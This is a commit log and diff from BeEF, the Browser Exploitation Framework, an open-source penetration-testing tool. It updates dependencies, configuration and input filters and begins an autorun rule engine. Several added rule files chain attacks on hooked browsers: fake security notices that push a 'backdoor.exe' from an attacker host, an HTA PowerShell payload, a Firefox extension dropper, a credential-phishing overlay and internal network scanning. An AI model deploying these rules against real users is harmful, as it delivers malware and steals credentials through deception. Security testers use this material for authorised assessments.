ff9da502cb surrounding InitDeviceScan in try/catch in case something wrong happens. This prevents the hook to die 2015-02-17 12:19:09 +01:00
Brendan Coles
1c7663f96d Use arguments 2015-02-09 08:51:18 +00:00
Brendan Coles
54b58c2e72 Use data stream/channel (Required by Chrome) 2015-02-09 08:50:36 +00:00
antisnatchor
bf0f59e5d0 Fixed a bug in the tunneling proxy (missing \r\n in some specific conditions when HTTP version is HTTP/1.1) 2015-02-08 13:39:04 +01:00
Michele Orru
add6059a8c Merge pull request #1097 from bcoles/rest_api_examples 
Add RESTful API example code
 2015-02-08 12:05:50 +01:00
Brendan Coles
f26302c52b Add RESTful API example code 2015-02-08 04:15:19 +00:00
Brendan Coles
803e153f8c Prevent duplicates 2015-02-07 15:51:55 +00:00
Brendan Coles
0afac0171d Make ports configurable 2015-02-07 12:51:00 +00:00
Brendan Coles
f5d2c2028b Replace 'console.log' with 'beef.debug' 2015-02-07 05:35:09 +00:00
Brendan Coles
73e16e4aff Allow web server imitation to hook server web root and 404 responses 2015-02-07 05:18:06 +00:00
Brendan Coles
234a6e2016 Remove foxit detection from hook init 2015-02-07 04:38:12 +00:00
Brendan Coles
fbe56bf9f1 Add Shuttle Tech 915WM DNS Hijack module 2015-02-07 04:35:16 +00:00
antisnatchor
d569c63be3 Merge branch 'bcoles-network_extension' 2015-02-05 12:35:48 +01:00
antisnatchor
944ba747da Fixed a bug in WebRTC command module, prevented duplicates in NetworkHost db table, removed unnecessary code. 2015-02-05 12:35:23 +01:00
antisnatchor
5fc1294ca1 Merge branch 'network_extension' of https://github.com/bcoles/beef into bcoles-network_extension 2015-02-05 10:26:14 +01:00
Brendan Coles
c099be75ed Use filters 2015-02-04 08:36:44 +00:00
Brendan Coles
f329c7331a Report identified service to network extension 2015-02-03 19:07:26 +00:00
Brendan Coles
c69b6412e0 Add support for localhost at NetworkHost 2015-02-03 17:40:11 +00:00
Brendan Coles
c28d53aa41 Add signatures 2015-02-03 17:36:28 +00:00
antisnatchor
23cf229dad Merge branch 'network_extension' of https://github.com/bcoles/beef into bcoles-network_extension 2015-02-03 15:22:33 +01:00
Brendan Coles
6809ec9914 Fix typo 2015-02-02 01:37:37 +00:00
Brendan Coles
d39da9a67b Add support for Chrome 40 2015-02-02 00:53:40 +00:00
Brendan Coles
7e3ee5fc50 Record OS 2015-02-01 02:06:52 +00:00
Brendan Coles
4ff2a09552 Reload grid on render 2015-02-01 02:05:35 +00:00
Brendan Coles
e11ab70c61 Reload grid on render 2015-01-31 22:51:30 +00:00
Brendan Coles
4b8aa2d0a2 Add signatures 2015-01-31 21:48:53 +00:00
Brendan Coles
7fc65a70af Add port scanning to network extension 2015-01-31 21:43:01 +00:00
Brendan Coles
fef015709b Update context menu 2015-01-30 22:10:48 +00:00
Brendan Coles
0623b8f667 Add Fingerprint Routers module 2015-01-30 21:16:29 +00:00
Brendan Coles
1838b6c24a Add D-Link DSL-2740R DNS Hijack module 2015-01-30 06:58:15 +00:00
Brendan Coles
16ecb32e46 Report identified hosts to network extension 2015-01-30 06:57:01 +00:00
Brendan Coles
53a05d1901 Add extension description 2015-01-29 18:00:05 +00:00
Brendan Coles
24dab8b1c9 UI - return if user cancels prompt 2015-01-29 16:01:19 +00:00
Brendan Coles
5b33389746 Add Philips and TP-Link DNS hijack modules 2015-01-25 18:53:09 +00:00
Brendan Coles
d3165c2d97 Fix logo in IE 2015-01-25 18:45:35 +00:00
Brendan Coles
8664f694dc Update Belkin DNS module 2015-01-25 18:33:25 +00:00
Brendan Coles
5d9c62967d Add options to scan commonly used LAN IPs 2015-01-24 18:26:15 +00:00
Brendan Coles
d75adc0899 Add context menu for empty Hosts grid 2015-01-20 15:36:28 +00:00
Brendan Coles
b105288a9b Add Identify LAN Subnets module 2015-01-20 15:19:09 +00:00
Brendan Coles
1318ccf019 remove payload url 2015-01-20 12:18:50 +00:00
Brendan Coles
a168274e7e update supported browsers in module configs 2015-01-20 11:41:45 +00:00
Brendan Coles
df08d99cd5 Report identified hosts to network extension 2015-01-20 11:36:50 +00:00
Brendan Coles
1ab979553c Add Get HTTP Servers module 2015-01-20 11:36:49 +00:00
Brendan Coles
631bc1e9ef Add Network panel to admin UI 2015-01-20 11:36:49 +00:00
Brendan Coles
ceab91d53a Add Network extension 2015-01-20 11:36:37 +00:00
Brendan Coles
bf75e61382 Add Cross-Origin Scanner module 2015-01-09 21:05:59 +00:00
Brendan Coles
c0fe6dfcfa Add not_working to module 2015-01-09 21:04:40 +00:00
Brendan Coles
eb2a380c92 Replace console.log with beef.debug 2015-01-08 16:25:50 +00:00
Brendan Coles
9e28e9075d do not load webrtcadapter.js lib unless webrtc extension is enabled 2015-01-07 12:34:49 +00:00
Wade Alcorn
b3df91a8c5 Merge branch 'master' of github.com:beefproject/beef 2015-01-07 14:10:51 +10:00
Brendan Coles
615fd63825 Add RFI Scanner module 2015-01-06 10:42:04 +00:00
Brendan Coles
8a8ea35265 Module clean up 2015-01-06 10:27:10 +00:00
Brendan Coles
a9833fd538 Add Apache Felix Remote Shell module 2015-01-01 21:16:56 +00:00
Saafan
a5e7823588 Adding the JS code of the Skype XSS exploit 2012-03-10 20:46:04 +02:00
asaafan
8c74fdd680 Adding branch for Skype XSS module 2012-03-09 01:55:44 +02:00
348 changed files with 15938 additions and 1478 deletions
Expand all files Collapse all files

1
.gitignore vendored
View File

@@ -1,6 +1,7 @@
### BeEF ###
beef.db
test/msf-test
extensions/admin_ui/media/javascript-min/
custom-config.yaml
.DS_Store
.gitignore

1
.ruby-gemset Normal file
View File

@@ -0,0 +1 @@
beef

1
.ruby-version Normal file
View File

@@ -0,0 +1 @@
2.2.4

77
Gemfile
View File

@@ -6,56 +6,61 @@
# See the file 'doc/COPYING' for copying permission
#
gem "eventmachine", "1.0.3"
gem "thin"
gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6" # WebSocket support
gem "uglifier", "~> 2.2.1"
gem 'eventmachine'
gem 'thin'
gem 'sinatra'
gem 'rack'
gem 'em-websocket', '~> 0.3.6' # WebSocket support
gem 'uglifier', '~> 2.2.1'
gem 'mime-types'
# Windows support
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
# make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
gem "therubyracer", "~> 0.11.0beta1"
gem "execjs"
gem "win32console"
elsif !RUBY_PLATFORM.downcase.include?("darwin")
gem "therubyracer", "0.11.3"
gem "execjs"
gem 'therubyracer', '~> 0.11.0beta1'
gem 'execjs'
gem 'win32console'
elsif !RUBY_PLATFORM.downcase.include?('darwin')
gem 'therubyracer', '0.11.3'
gem 'execjs'
end
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
gem "json"
gem "data_objects"
gem "dm-sqlite-adapter" # SQLite support
gem 'ansi'
gem 'term-ansicolor', :require => 'term/ansicolor'
gem 'dm-core'
gem 'json'
gem 'data_objects'
gem 'dm-sqlite-adapter' # SQLite support
#gem dm-postgres-adapter # PostgreSQL support
#gem dm-mysql-adapter # MySQL support
gem "parseconfig"
gem "erubis"
gem "dm-migrations"
gem "msfrpc-client" # Metasploit Integration extension
#gem "twitter", ">= 5.0.0" # Twitter Notifications extension
gem "rubyzip", ">= 1.0.0"
gem "rubydns", "0.7.0" # DNS extension
gem "geoip" # geolocation support
gem 'parseconfig'
gem 'erubis'
gem 'dm-migrations'
gem 'msfrpc-client' # Metasploit Integration extension
#gem 'twitter', '>= 5.0.0' # Twitter Notifications extension
gem 'rubyzip', '>= 1.0.0'
gem 'rubydns', '0.7.0' # DNS extension
gem 'geoip' # geolocation support
gem 'dm-serializer' # network extension
gem 'qr4r' # QRcode extension
# For running unit tests
if ENV['BEEF_TEST']
gem "test-unit"
gem "test-unit-full"
gem "curb"
gem "test-unit"
gem "selenium"
gem "selenium-webdriver"
gem 'test-unit'
gem 'test-unit-full'
gem 'curb'
gem 'selenium'
gem 'selenium-webdriver'
gem 'rspec'
gem 'bundler-audit'
# nokogirl is needed by capybara which may require one of the below commands
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem "capybara"
gem 'capybara'
# RESTful API tests/generic command module tests
gem "rest-client", "~> 1.6.7"
gem 'rest-client', '~> 1.8.0'
end
source "http://rubygems.org"
source 'https://rubygems.org'

213
Gemfile.lock Normal file
View File

@@ -0,0 +1,213 @@
GEM
remote: https://rubygems.org/
specs:
addressable (2.3.6)
ansi (1.4.3)
atk (3.0.7)
glib2 (= 3.0.7)
bundler-audit (0.4.0)
bundler (~> 1.2)
thor (~> 0.18)
cairo (1.14.3)
pkg-config (>= 1.1.5)
capybara (2.5.0)
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.8)
ffi (~> 1.0, >= 1.0.11)
chunky_png (1.3.5)
curb (0.8.8)
daemons (1.1.9)
data_objects (0.10.14)
addressable (~> 2.1)
diff-lcs (1.2.5)
dm-core (1.2.1)
addressable (~> 2.3)
dm-do-adapter (1.2.0)
data_objects (~> 0.10.6)
dm-core (~> 1.2.0)
dm-migrations (1.2.0)
dm-core (~> 1.2.0)
dm-serializer (1.2.2)
dm-core (~> 1.2.0)
fastercsv (~> 1.5)
json (~> 1.6)
json_pure (~> 1.6)
multi_json (~> 1.0)
dm-sqlite-adapter (1.2.0)
dm-do-adapter (~> 1.2.0)
do_sqlite3 (~> 0.10.6)
do_sqlite3 (0.10.14)
data_objects (= 0.10.14)
domain_name (0.5.25)
unf (>= 0.0.5, < 1.0.0)
em-websocket (0.3.8)
addressable (>= 2.1.1)
eventmachine (>= 0.12.9)
erubis (2.7.0)
eventmachine (1.0.7)
execjs (2.0.2)
fastercsv (1.5.5)
ffi (1.9.10)
gdk_pixbuf2 (3.0.7)
glib2 (= 3.0.7)
geoip (1.4.0)
glib2 (3.0.7)
pkg-config
gtk2 (3.0.7)
atk (= 3.0.7)
gdk_pixbuf2 (= 3.0.7)
pango (= 3.0.7)
hoe (3.14.2)
rake (>= 0.8, < 11.0)
http-cookie (1.0.2)
domain_name (~> 0.5)
jar_wrapper (0.1.8)
zip
json (1.8.1)
json_pure (1.8.3)
librex (0.0.68)
mime-types (2.99)
mini_portile (0.6.2)
mojo_magick (0.5.6)
msfrpc-client (1.0.1)
librex (>= 0.0.32)
msgpack (>= 0.4.5)
msgpack (0.5.8)
multi_json (1.9.3)
netrc (0.11.0)
nokogiri (1.6.6.4)
mini_portile (~> 0.6.0)
pango (3.0.7)
cairo (>= 1.14.0)
glib2 (= 3.0.7)
parseconfig (1.0.4)
pkg-config (1.1.6)
power_assert (0.2.6)
qr4r (0.4.0)
mojo_magick
rqrcode
rack (1.5.2)
rack-protection (1.5.3)
rack
rack-test (0.6.3)
rack (>= 1.0)
rainbow (2.0.0)
rake (10.4.2)
rest-client (1.8.0)
http-cookie (>= 1.0.2, < 2.0)
mime-types (>= 1.16, < 3.0)
netrc (~> 0.7)
rexec (1.6.3)
rainbow
rqrcode (0.7.0)
chunky_png
rr (1.1.2)
rspec (3.4.0)
rspec-core (~> 3.4.0)
rspec-expectations (~> 3.4.0)
rspec-mocks (~> 3.4.0)
rspec-core (3.4.1)
rspec-support (~> 3.4.0)
rspec-expectations (3.4.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.4.0)
rspec-mocks (3.4.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.4.0)
rspec-support (3.4.1)
rubydns (0.7.0)
eventmachine (~> 1.0.0)
rexec (~> 1.6.2)
rubyzip (1.1.3)
selenium (0.2.11)
jar_wrapper
selenium-webdriver (2.48.1)
childprocess (~> 0.5)
multi_json (~> 1.0)
rubyzip (~> 1.0)
websocket (~> 1.0)
sinatra (1.4.2)
rack (~> 1.5, >= 1.5.2)
rack-protection (~> 1.4)
tilt (~> 1.3, >= 1.3.4)
term-ansicolor (1.1.5)
test-unit (3.1.5)
power_assert
test-unit-full (0.0.3)
test-unit
test-unit-notify
test-unit-rr
test-unit-runner-fox
test-unit-runner-gtk2
test-unit-runner-tk
test-unit-notify (1.0.4)
test-unit (>= 2.4.9)
test-unit-rr (1.0.3)
rr (>= 1.1.1)
test-unit (>= 2.5.2)
test-unit-runner-fox (0.0.1)
hoe (>= 1.6.0)
test-unit-runner-gtk2 (0.0.2)
gtk2
test-unit
test-unit-runner-tk (0.0.1)
hoe (>= 1.6.0)
thin (1.6.2)
daemons (>= 1.0.9)
eventmachine (>= 1.0.0)
rack (>= 1.0.0)
thor (0.19.1)
tilt (1.4.1)
uglifier (2.2.1)
execjs (>= 0.3.0)
multi_json (~> 1.0, >= 1.0.2)
unf (0.1.4)
unf_ext
unf_ext (0.0.7.1)
websocket (1.2.2)
xpath (2.0.0)
nokogiri (~> 1.3)
zip (2.0.2)
PLATFORMS
ruby
DEPENDENCIES
ansi
bundler-audit
capybara
curb
data_objects
dm-core
dm-migrations
dm-serializer
dm-sqlite-adapter
em-websocket (~> 0.3.6)
erubis
eventmachine
geoip
json
mime-types
msfrpc-client
parseconfig
qr4r
rack
rest-client (~> 1.8.0)
rspec
rubydns (= 0.7.0)
rubyzip (>= 1.0.0)
selenium
selenium-webdriver
sinatra
term-ansicolor
test-unit
test-unit-full
thin
uglifier (~> 2.2.1)
BUNDLED WITH
1.10.6

6
INSTALL.txt
View File

@@ -33,8 +33,10 @@ Installation
http://www.sqlite.org/sqlitedll-3_7_0_1.zip
Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/eakmotion/therubyracer_for_windows.
Finally, edit beef's gem lock file by replacing the required ruby racer version with the version downloaded from the link above.
3. Prerequisites (Linux)
!!! This must be done PRIOR to running the bundle install command !!!
@@ -52,7 +54,7 @@ Installation
- Ruby 1.9
To install RVM and Ruby 1.9.3 on Mac OS:
$ bash -s stable < <(curl -Ls https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ bash -s stable < <(curl -Ls https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p484
$ rvm use 1.9.3

6
README
View File

@@ -24,7 +24,9 @@ Please, send us pull requests!
Web: http://beefproject.com/
Mail: beef-subscribe@bindshell.net
Bugs: https://github.com/beefproject/beef
Security Bugs: security@beefproject.com
IRC: ircs://irc.freenode.net/beefproject
@@ -48,7 +50,7 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
$ bash -s stable < <(curl -Ls https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
$ bash -s stable < <(curl -Ls https://raw.githubusercontent.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage

6
README.mkd
View File

@@ -24,7 +24,9 @@ __Please, send us pull requests!__
__Web:__ http://beefproject.com/
__Mail:__ beef-subscribe@bindshell.net
__Bugs:__ https://github.com/beefproject/beef
__Security Bugs:__ security@beefproject.com
__IRC:__ ircs://irc.freenode.net/beefproject
@@ -48,7 +50,7 @@ __The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
$ curl -L https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
$ curl -L https://raw.githubusercontent.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage

34
Rakefile
View File

@@ -45,10 +45,44 @@ task :msf => ["install", "msf_install"] do
Rake::Task['msf_stop'].invoke
end
################################
# run bundle-audit
namespace :bundle_audit do
require 'bundler/audit/cli'
desc 'Update bundle-audit database'
task :update do
Bundler::Audit::CLI.new.update
end
desc 'Check gems for vulns using bundle-audit'
task :check do
Bundler::Audit::CLI.new.check
end
desc 'Update vulns database and check gems using bundle-audit'
task :run do
Rake::Task['bundle_audit:update'].invoke
Rake::Task['bundle_audit:check'].invoke
end
end
desc "Run bundle-audit"
task :bundle_audit do
Rake::Task['bundle_audit:run'].invoke
end
################################
# Install
#task :install do
# sh "export BEEF_TEST=true"
#end
################################
# X11 set up

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.6.0-alpha
0.4.6.1-alpha

35
arerules/c_osx_test-return-mods.json Normal file
View File

@@ -0,0 +1,35 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "S",
"browser_version": ">= 7",
"os": "OSX",
"os_version": "<= 10.10",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}

2
arerules/enabled/README Normal file
View File

@@ -0,0 +1,2 @@
Move here the ARE rule files that you want to pre-load when BeEF starts.
Make sure they are .json files (any other file extension is ignored).

20
arerules/ff_osx_extension-dropper.json Normal file
View File

@@ -0,0 +1,20 @@
{
"name": "Firefox Extension Dropper",
"author": "antisnatchor",
"browser": "FF",
"browser_version": "ALL",
"os": "OSX",
"os_version": ">= 10.8",
"modules": [{
"name": "firefox_extension_dropper",
"condition": null,
"options": {
"extension_name": "Ummeneske",
"xpi_name": "Ummeneske",
"base_host": "http://172.16.45.1:3000"
}
}],
"execution_order": [0],
"execution_delay": [0],
"chain_mode": "sequential"
}

28
arerules/ff_tux_webrtc-internalip.json Normal file
View File

@@ -0,0 +1,28 @@
{"name": "Get Internal IP (WebRTC)",
"author": "antisnatchor",
"browser": "FF",
"browser_version": ">= 31",
"os": "Linux",
"os_version": "ALL",
"modules": [
{"name": "get_internal_ip_webrtc",
"condition": null,
"code": null,
"options": {}
},
{"name": "internal_network_fingerprinting",
"condition": "status==1",
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
"options": {
"ipRange":"<<mod_input>>",
"ports":"80",
"threads":"5",
"wait":"2",
"timeout":"10"
}
}
],
"execution_order": [0,1],
"execution_delay": [0, 0],
"chain_mode": "nested-forward"
}

31
arerules/ie_win_fakenotification-clippy.json Normal file
View File

@@ -0,0 +1,31 @@
{
"name": "Ie Fake Notification + Clippy",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "== 11",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
}
}
,{
"name": "clippy",
"condition": null,
"options": {
"clippydir": "http://172.16.45.1:3000/clippy/",
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
"respawntime":"5000",
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
}
}
],
"execution_order": [0,1],
"execution_delay": [0,2000],
"chain_mode": "sequential"
}

27
arerules/ie_win_htapowershell.json Normal file
View File

@@ -0,0 +1,27 @@
{
"name": "HTA PowerShell",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "ALL",
"os": "Windows",
"os_version": ">= 7",
"modules": [
{
"name": "fake_notification_ie",
"condition": null,
"options": {
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
}
},
{
"name": "hta_powershell",
"condition": null,
"options": {
"domain":"http://172.16.45.1:3000",
"ps_url":"/ps"
}
}],
"execution_order": [0,1],
"execution_delay": [0,500],
"chain_mode": "sequential"
}

27
arerules/ie_win_missingflash-prettytheft.json Normal file
View File

@@ -0,0 +1,27 @@
{
"name": "Fake missing plugin + Pretty Theft LinkedIn",
"author": "antisnatchor",
"browser": "IE",
"browser_version": ">= 8",
"os": "Windows",
"os_version": "== XP",
"modules": [{
"name": "fake_notification_c",
"condition": null,
"options": {
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
}
}, {
"name": "pretty_theft",
"condition": null,
"options": {
"choice": "Windows",
"backing": "Grey",
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
}
}],
"execution_order": [0, 1],
"execution_delay": [0, 5000],
"chain_mode": "sequential"
}

35
arerules/ie_win_test-return-mods.json Normal file
View File

@@ -0,0 +1,35 @@
{
"name": "Test return debug stuff",
"author": "antisnatchor",
"browser": "IE",
"browser_version": "<= 8",
"os": "Windows",
"os_version": ">= XP",
"modules": [{
"name": "test_return_ascii_chars",
"condition": null,
"options": {}
}, {
"name": "test_return_long_string",
"condition": "status==1",
"code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
"options": {
"repeat": "10",
"repeat_string": "<<mod_input>>"
}
},
{
"name": "alert_dialog",
"condition": "status=1",
"code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
"options":{"text":"<<mod_input>>"}
},
{
"name": "get_page_html",
"condition": null,
"options": {}
}],
"execution_order": [0, 1, 2, 3],
"execution_delay": [0, 0, 0, 0],
"chain_mode": "nested-forward"
}

13
beef
View File

@@ -35,7 +35,7 @@ require 'core/loader'
if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
else
config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
config = BeEF::Core::Configuration.new("#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
end
# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
@@ -130,12 +130,21 @@ end
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
# Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory
BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory
# @note Start the HTTP Server, we additionally check whether we load the Console Shell or not
if config.get("beef.extension.console.shell.enable") == true
require 'extensions/console/shell'
puts ""
begin
FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
log_dir = File.expand_path(config.get("beef.extension.console.shell.historyfolder"))
FileUtils.mkdir_p(log_dir) unless File.directory?(log_dir)
rescue => e
print_error "Could not create log directory for shell history '#{log_dir}': #{e.message}"
exit 1
end
begin
BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
rescue Interrupt

32
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.6.0-alpha'
version: '0.4.6.1-alpha'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
@@ -33,7 +33,7 @@ beef:
# NOTE: A poll timeout of less than 5,000 (ms) might impact performance
# when hooking lots of browsers (50+).
# Enabling WebSockets is generally better (beef.websocket.enable)
xhr_poll_timeout: 5000
xhr_poll_timeout: 1000
# Reverse Proxy / NAT
# If BeEF is running behind a reverse proxy or NAT
@@ -73,7 +73,8 @@ beef:
web_server_imitation:
enable: true
type: "apache" # Supported: apache, iis, nginx
hook_404: false # inject BeEF hook in HTTP 404 responses
hook_root: false # inject BeEF hook in the server home page
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
@@ -100,10 +101,10 @@ beef:
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 5432
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "beef123"
db_passwd: "beef"
db_encoding: "UTF-8"
# Credentials to authenticate in BeEF.
@@ -112,12 +113,18 @@ beef:
user: "beef"
passwd: "beef"
# Autorun modules as soon the browser is hooked.
# NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
# Autorun Rule Engine
autorun:
enable: true
# set this to TRUE if you want to allow auto-run execution for modules with target->user_notify
allow_user_notify: true
# this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
# to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
# continue execution regardless of results.
# If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
result_poll_interval: 300
result_poll_timeout: 5000
# If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
# This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
continue_after_timeout: true
# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false
@@ -156,6 +163,9 @@ beef:
enable: false
ipec:
enable: true
# this is still experimental, we're working on it..
# this is still experimental..
dns:
enable: true
# this is still experimental..
dns_rebinding:
enable: false

8
core/bootstrap.rb
View File

@@ -32,6 +32,13 @@ require 'core/main/network_stack/api'
# @note Include the distributed engine
require 'core/main/distributed_engine/models/rules'
# @note Include the autorun engine
require 'core/main/autorun_engine/models/rule'
require 'core/main/autorun_engine/models/execution'
require 'core/main/autorun_engine/parser'
require 'core/main/autorun_engine/engine'
require 'core/main/autorun_engine/rule_loader'
## @note Include helpers
require 'core/module'
require 'core/modules'
@@ -46,6 +53,7 @@ require 'core/main/rest/handlers/categories'
require 'core/main/rest/handlers/logs'
require 'core/main/rest/handlers/admin'
require 'core/main/rest/handlers/server'
require 'core/main/rest/handlers/autorun_engine'
require 'core/main/rest/api'
## @note Include Websocket

23
core/filters/base.rb
View File

@@ -22,7 +22,7 @@ module Filters
# @return [Boolean] Whether or not the only characters in str are specified in chars
def self.only?(chars, str)
regex = Regexp.new('[^' + chars + ']')
regex.match(str).nil?
regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
end
# Check if one or more characters in 'chars' are in 'str'
@@ -31,7 +31,7 @@ module Filters
# @return [Boolean] Whether one of the characters exists in the string
def self.exists?(chars, str)
regex = Regexp.new(chars)
not regex.match(str).nil?
not regex.match(str.encode('UTF-8', invalid: :replace, undef: :replace, replace: '')).nil?
end
# Check for null char
@@ -142,6 +142,25 @@ module Filters
valid
end
# Checks if the given string is a valid private IP address
# @param [String] ip string for testing
# @return [Boolean] true if the string is a valid private IP address, otherwise false
# @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8,
# but does not include local-link addresses.
def self.is_valid_private_ip?(ip)
return false unless is_valid_ip?(ip)
return ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
end
# Checks if the given string is a valid TCP port
# @param [String] port string for testing
# @return [Boolean] true if the string is a valid TCP port, otherwise false
def self.is_valid_port?(port)
valid = false
valid = true if port.to_i > 0 && port.to_i < 2**16
valid
end
# Checks if string is a valid domain name
# @param [String] domain string for testing
# @return [Boolean] If the string is a valid domain name

18
core/filters/browser.rb
View File

@@ -51,11 +51,25 @@ module Filters
# @param [String] str String for testing
# @return [Boolean] If the string has valid browser version characters
def self.is_valid_browserversion?(str)
return false if not is_non_empty_string?(str)
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return true if str.eql? "UNKNOWN"
return true if str.eql? "ALL"
return false if not nums_only?(str) and not is_valid_float?(str)
return false if str.length > 10
return false if str.length > 20
true
end
# Verify the os version string is valid
# @param [String] str String for testing
# @return [Boolean] If the string has valid os version characters
def self.is_valid_osversion?(str)
return false unless is_non_empty_string?(str)
return false if has_non_printable_char?(str)
return true if str.eql? "UNKNOWN"
return true if str.eql? "ALL"
return false unless BeEF::Filters::only?("a-zA-Z0-9.<=> ", str)
return false if str.length > 20
true
end

2
core/filters/http.rb
View File

@@ -14,8 +14,6 @@ module Filters
return false if has_non_printable_char?(str)
return false if str.length > 255
return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-\.]*[a-zA-Z0-9]$/).nil?
return false if not (str =~ /\.\./).nil?
return false if not (str =~ /\-\-/).nil?
true
end

1
core/loader.rb
View File

@@ -16,6 +16,7 @@ require 'base64'
require 'xmlrpc/client'
require 'openssl'
require 'rubydns'
require 'mime/types'
# @note Include the filters
require 'core/filters'

458
core/main/autorun_engine/engine.rb Normal file
View File

@@ -0,0 +1,458 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
class Engine
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@result_poll_interval = @config.get('beef.autorun.result_poll_interval')
@result_poll_timeout = @config.get('beef.autorun.result_poll_timeout')
@continue_after_timeout = @config.get('beef.autorun.continue_after_timeout')
@debug_on = @config.get('beef.debug')
